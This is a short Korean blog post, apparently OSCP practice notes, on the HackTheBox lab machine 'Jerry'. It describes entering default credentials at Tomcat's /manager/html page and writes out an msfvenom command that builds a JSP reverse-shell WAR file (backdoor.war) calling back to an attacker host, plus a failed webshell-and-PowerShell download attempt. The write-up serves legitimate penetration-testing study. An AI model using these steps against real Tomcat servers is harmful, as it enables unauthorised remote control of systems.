Jerry
배운점
- 디폴트페이지 접근
- msfvenom .war 타입 쉘 지원
1. tomcat 메니저 페이지 접근 후 디폴트 credential 입력
/manager/html
2. msfvenom으로 jsp/war 타입 리버스쉘 페이로드 생성하여 업로드
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.xx.xx LPORT=4449 -f war > backdoor.war
잘못된 점
- msfvenom에서 war타입 리버스 쉘을 제공하는지 모르고 빙빙돌아감
1. 칼리에 존재하는 jsp 웹쉘 war파일을 올린 후 msfvenom으로 tcp리버스 쉘 생성하여 업로드
2. jsp웹쉘에 접근, 파워쉘로 venom 페이로드 다운로드 받았지만 exe파일 실행이 안되서 망함.
3. 내가 사용한 단순 cmd jsp웹쉘은 디렉토리 목록도 안보이고 기능이 뭔가 어설픔.
커맨드에 powershell dir 을 통해 보안할 수 있었지만 exe파일 실행은 죽어도 안되더라.
'OSCP > HackTheBox' 카테고리의 다른 글
| [Windows] Access (0) | 2020.09.26 |
|---|---|
| [Windows] Chatterbox (0) | 2020.09.24 |
| [Linux] SwagShop (0) | 2020.09.18 |
| [Linux] Irked (0) | 2020.09.16 |
| [Linux] October (0) | 2020.09.16 |